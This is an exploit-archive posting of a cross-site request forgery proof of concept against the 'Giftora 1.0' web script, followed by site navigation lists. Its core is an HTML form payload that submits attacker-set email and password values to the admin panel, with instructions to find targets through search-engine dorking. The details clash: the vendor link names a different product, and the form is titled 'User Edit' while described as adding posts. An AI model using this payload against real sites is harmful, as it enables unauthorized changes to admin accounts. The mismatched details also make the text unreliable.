Giftora 1.0 Cross Site Request Forgery

Giftora 1.0 Cross Site Request Forgery: Posted Aug 13, 2024; Authored by indoushka; Giftora version 1.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 7071cbb4889154761d9ae9cf373afbb5f77faa3e9e23cfede27fd5c5a660ad25; Download | Favorite | View

Giftora 1.0 Cross Site Request Forgery

=============================================================================================================================================
| # Title     : Giftora V 1.0 CSRF Vulnerability                                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML Add New posts .

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] infected file :  /admincp/new-post.

[+] save code as poc.html 

[+] payload : 

</head>
<body>
  <div class="container">
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>
    <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST"  enctype="multipart/form-data">
      <div hidden="true">
        <input type="text" name="id" id="id" value="1">
      </div>
       <div>
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">
       </div>
       <div>
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">
       </div>
       <tr>
       <div>
        <label for='status'>Status</label>
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>
        
       </div>   
       <div style='height:80'>
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>
       </div>
    </form>
  </div>

</body>
</html>
[+] demo https://127.0.0.1/giftora.webister.net/blog


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Top Authors In Last 30 Days

Red Hat 291 files
Ubuntu 63 files
LiquidWorm 29 files
indoushka 20 files
Debian 19 files
Apple 10 files
Google Security Research 7 files
Chokri Hammedi 3 files
Jann Horn 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,154)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,795)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,227)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,962)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Giftora 1.0 Cross Site Request Forgery

Giftora 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Giftora 1.0 Cross Site Request Forgery

Share This

Giftora 1.0 Cross Site Request Forgery

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems